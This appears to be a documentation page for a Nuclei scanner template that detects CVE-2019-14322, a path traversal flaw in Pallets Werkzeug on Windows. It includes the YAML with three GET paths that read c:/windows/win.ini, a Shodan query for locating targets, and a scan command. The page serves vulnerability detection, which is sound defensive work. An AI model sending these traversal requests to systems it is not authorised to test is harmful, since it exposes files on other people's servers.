Skip to content
Nuclei Templates

Pallets Werkzeug <0.15.5 - Local File Inclusion

ID: CVE-2019-14322

Severity: high

Author: madrobot

Tags: cve,cve2019,lfi,odoo,packetstorm,palletsprojects,microsoft

Description

Section titled “Description”

Pallets Werkzeug before 0.15.5 is susceptible to local file inclusion because SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames.

YAML Source

Section titled “YAML Source”
id: CVE-2019-14322


info:
  name: Pallets Werkzeug <0.15.5 - Local File Inclusion
  author: madrobot
  severity: high
  description: |
    Pallets Werkzeug before 0.15.5 is susceptible to local file inclusion because SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames.
  impact: |
    The LFI vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution.
  remediation: |
    Upgrade Pallets Werkzeug to version 0.15.5 or above to mitigate the LFI vulnerability.
  reference:
    - https://palletsprojects.com/blog/werkzeug-0-15-5-released/
    - http://packetstormsecurity.com/files/163398/Pallets-Werkzeug-0.15.4-Path-Traversal.html
    - https://nvd.nist.gov/vuln/detail/CVE-2019-14322
    - https://github.com/faisalfs10x/CVE-2019-14322-scanner
    - https://github.com/sobinge/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-14322
    cwe-id: CWE-22
    epss-score: 0.64382
    epss-percentile: 0.97881
    cpe: cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: microsoft
    product: windows
    shodan-query: cpe:"cpe:2.3:o:microsoft:windows"
  tags: cve,cve2019,lfi,odoo,packetstorm,palletsprojects,microsoft


http:
  - method: GET
    path:
      - "{{BaseURL}}/base_import/static/c:/windows/win.ini"
      - "{{BaseURL}}/web/static/c:/windows/win.ini"
      - "{{BaseURL}}/base/static/c:/windows/win.ini"


    stop-at-first-match: true


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e156f4400c97fda0218cb9748b1f0a5ff5874a885bea77f25a990d8e89a69522022056f05ce250599c3006d3cc971a81fa7ff3554d8e411a3039272b5354bd1c8e32:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-14322.yaml"

View on Github